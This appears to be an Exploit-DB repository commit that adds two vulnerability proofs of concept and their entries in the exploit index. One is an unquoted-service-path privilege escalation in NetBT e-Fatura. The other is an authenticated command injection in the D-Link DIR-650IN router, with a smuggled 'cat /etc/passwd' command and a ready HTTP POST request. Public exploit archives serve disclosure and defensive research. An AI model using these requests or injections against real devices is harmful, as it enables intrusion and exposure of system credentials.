DB: 2026-04-11

Exploit-DB · Exploit-DB · commit 73f8d632421a · 2026-04-11T00:17:02.000Z
3 changes to exploits/shellcodes/ghdb

NetBT e-Fatura - Privilege Escalation

D-Link DIR-650IN - Authenticated Command Injection
diff --git a/exploits/multiple/local/52509.txt b/exploits/multiple/local/52509.txt
@@ -0,0 +1,46 @@
+# Exploit Title: NetBT e-Fatura - Privilege Escalation
+# Author: Seccops
+# Discovery Date: 2025-10-03
+# Vendor: https://net-bt.com.tr/e-fatura/
+# Tested Version: 2024
+# Tested on OS: Microsoft Windows Server 2019 DC
+# Vulnerability Type: CWE-428 Unquoted Search Path or Element
+# CVE: CVE-2025-14018
+
+Note: Thanks "Levent Sungu" for providing the testing environment.
+
+====================
+Description & Impact
+====================
+This vulnerability allows an unauthorized local user to execute arbitrary code with high privileges on the system.
+
+================
+Proof of Concept
+================
+
+C:\Users\efatura>sc qc InboxProcessor
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: InboxProcessor
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\inetpub\wwwroot\InboxProcessor\Netbt.Inbox.Process.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : InboxProcessor
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+
+C:\Users\efatura\Desktop>accesschk.exe /accepteula -uwdq "C:\inetpub\wwwroot\InboxProcessor\"
+
+Accesschk v6.15 - Reports effective permissions for securable objects
+Copyright (C) 2006-2022 Mark Russinovich
+Sysinternals - www.sysinternals.com
+
+C:\inetpub\wwwroot\InboxProcessor
+  RW BUILTIN\Users
+  RW NT SERVICE\TrustedInstaller
+  RW NT AUTHORITY\SYSTEM
+  RW BUILTIN\Administrators
diff --git a/exploits/multiple/webapps/52508.txt b/exploits/multiple/webapps/52508.txt
@@ -0,0 +1,37 @@
+# Exploit Title: D-Link DIR-650IN - Authenticated Command Injection
+# Date: 2023-01-08
+# Exploit Author: Sanjay Singh
+# Vendor Homepage: https://www.dlink.com
+# Software Link: https://dlinkmea.com/index.php/product/details?det=T082aVdUWUFNR2FRblBBQUxMWlVTZz09
+# Version: Firmware V1.04 (REQUIRED)
+# Tested on: DIR-650IN Web UI (Boa/0.94.14rc21), Windows 10 / Chrome 108
+# CVE: N/A (Version included now, previously missing)
+
+Description:
+The D-Link DIR-650IN Wireless N300 Router is vulnerable to an Authenticated Command Injection vulnerability in the Diagnostic (Ping / Traceroute) functionality.
+
+The parameter sysHost is not sanitized, allowing an authenticated attacker (even with low-privilege access) to inject OS commands. Exploitation leads to full compromise of the router, including reading sensitive system files such as /etc/passwd.
+
+Steps to Reproduce:
+1. Log in to the router web interface.
+2. Go to Management → Diagnostic.
+3. Select Ping or Traceroute.
+4. Enter: google.com | cat /etc/passwd
+5. Click Apply.
+6. Output includes /etc/passwd contents.
+
+HTTP PoC:
+POST /boafrm/formSysCmd HTTP/1.1
+Host: 192.168.0.1
+Authorization: Basic YWRtaW46YWRtaW4=
+Content-Type: application/x-www-form-urlencoded
+
+submit-url=%2Fsyscmd.htm&sysCmd=ping&sysCmdType=ping&checkNum=5&sysHost=google.com%7Ccat%20/etc/passwd&apply=Apply
+
+Response Extract:
+root:XEOFcsRJLyXbQ:0:0:root:/:/bin/sh
+nobody:x:0:0:nobody:/:/dev/null
+
+References:
+https://www.dlink.com
+https://dlinkmea.com/index.php/product/details?det=T082aVdUWUFNR2FRblBBQUxMWlVTZz09
diff --git a/files_exploits.csv b/files_exploits.csv
@@ -10522,6 +10522,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 10072,exploits/multiple/local/10072.c,"Multiple Vendor - TLS Protocol Session Renegotiation Security",2009-11-12,"Marsh Ray",local,multiple,,2009-11-11,,1,,,,,,
 19721,exploits/multiple/local/19721.txt,"MySQL 3.22.27/3.22.29/3.23.8 - GRANT Global Password Changing",2000-02-15,"Viktor Fougstedt",local,multiple,,2000-02-15,2012-07-10,1,CVE-2000-0045;OSVDB-9906,,,,,https://www.securityfocus.com/bid/926/info
 19447,exploits/multiple/local/19447.c,"NetBSD 1.4 / OpenBSD 2.5 / Solaris 7.0 - 'profil(2)' Modify The Internal Data Space",1999-08-09,"Ross Harvey",local,multiple,,1999-08-09,2017-11-15,1,CVE-1999-0674;OSVDB-1033,,,,,https://www.securityfocus.com/bid/570/info
+52509,exploits/multiple/local/52509.txt,"NetBT e-Fatura - Privilege Escalation",2026-04-10,seccops,local,multiple,,2026-04-10,2026-04-10,0,CVE-2025-14018,,,,,
 32055,exploits/multiple/local/32055.txt,"Netrw Vim Script - 's:BrowserMaps()' Command Execution",2008-07-16,"Jan Minar",local,multiple,,2008-07-16,2014-03-09,1,,,,,,https://www.securityfocus.com/bid/30254/info
 19692,exploits/multiple/local/19692.c,"Netscape Communicator 4.5 - prefs.js Buffer Overflow",1999-12-24,"Steve Fewer",local,multiple,,1999-12-24,2012-07-08,1,,,,,,https://www.securityfocus.com/bid/893/info
 19912,exploits/multiple/local/19912.txt,"Netscape Communicator 4.5/4.51/4.6/4.61/4.7/4.72/4.73 - '/tmp' Symlink",2000-05-10,foo,local,multiple,,2000-05-10,2012-07-18,1,CVE-2000-0409;OSVDB-1331,,,,,https://www.securityfocus.com/bid/1201/info
@@ -11957,6 +11958,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 52172,exploits/multiple/webapps/52172.py,"CyberPanel 2.3.6 - Remote Code Execution (RCE)",2025-04-11,"Luka Petrovic (refr4g)",webapps,multiple,,2025-04-11,2025-04-13,0,CVE-2024-51378,,,,,
 50909,exploits/multiple/webapps/50909.txt,"Cyclos 4.14.7 - 'groupId' DOM Based Cross-Site Scripting (XSS)",2022-05-11,"Tin Pham",webapps,multiple,,2022-05-11,2022-05-11,0,CVE-2021-31673,,,,,
 50908,exploits/multiple/webapps/50908.txt,"Cyclos 4.14.7 - DOM Based Cross-Site Scripting (XSS)",2022-05-11,"Tin Pham",webapps,multiple,,2022-05-11,2022-05-11,0,CVE-2021-31674,,,,,
+52508,exploits/multiple/webapps/52508.txt,"D-Link DIR-650IN - Authenticated Command Injection",2026-04-10,"Sanjay Singh",webapps,multiple,,2026-04-10,2026-04-10,0,,,,,,
 43847,exploits/multiple/webapps/43847.py,"DarkComet (C2 Server) - File Upload",2018-01-15,"Pseudo Laboratories",webapps,multiple,,2018-01-21,2018-01-21,0,,Malware,,,,https://pseudolaboratories.github.io/DarkComet-upload-vulnerability/
 9722,exploits/multiple/webapps/9722.txt,"DDL CMS 1.0 - Multiple Remote File Inclusions",2009-09-21,HxH,webapps,multiple,,2009-09-20,,1,OSVDB-58291;CVE-2009-3331;OSVDB-58290;OSVDB-58276;OSVDB-58275,,,,,
 32556,exploits/multiple/webapps/32556.txt,"Dell SonicWALL EMail Security Appliance Application 7.4.5 - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,webapps,multiple,8619,2014-03-27,2014-03-27,0,OSVDB-105106;OSVDB-105105;CVE-2014-2879,,,,,https://www.vulnerability-lab.com/get_content.php?id=1191
